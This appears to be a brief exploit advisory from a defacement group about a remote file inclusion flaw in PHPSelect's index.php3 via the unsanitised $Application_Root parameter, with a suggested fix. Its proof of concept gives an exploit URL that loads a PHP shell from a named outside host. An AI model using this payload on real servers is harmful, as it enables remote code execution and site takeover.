PHPSelect.txt

`+--------------------------------------------------------------------  
+  
+ PHPSelect Web Development Division :) <= Remote File Inclusion  
+  
+--------------------------------------------------------------------  
+  
+ Affected Software .: PHPSelect Web Development Division  
+ Venedor ...........: http://www.phpselect.com/   
+ Class .............: Remote File Inclusion  
+ Risk ..............: high (Remote File Execution)  
+ Found by ..........: rUnViRuS  
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/   
+ Contact ...........: stormhacker[at]hotmail[.]com  
+  
+--------------------------------------------------------------------  
+  
+ Code index.php3:  
+  
+ .....  
+ include("$Application_Root/modules/include/global_settings");  
+ .....  
+  
+--------------------------------------------------------------------  
+  
+ $Application_Root is not properly sanitized before being used.  
+ The bug is in the "PDD" Package for PHPSelect Web Development Division.  
+  
+--------------------------------------------------------------------  
+  
+ Solution:  
+ Add this line to your php-file:  
+  
+ $Application_Root ="user/dir" //Your root path  
+  
+--------------------------------------------------------------------  
+ PoC:  
+ Place a PHPShell on a remote location:  
+ http://wdzone.net/sh.txt?  
+  
+  
http://[target]/index.php3?Application_Root=http://phpshell  
+  
+--------------------------------------------------------------------  
+ [W]orld [D]efacers [T]eam  
+ Greets:  
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||  
+ || Pro Hacker ||  
+  
+-------------------------[ W D T ]----------------------------------  
`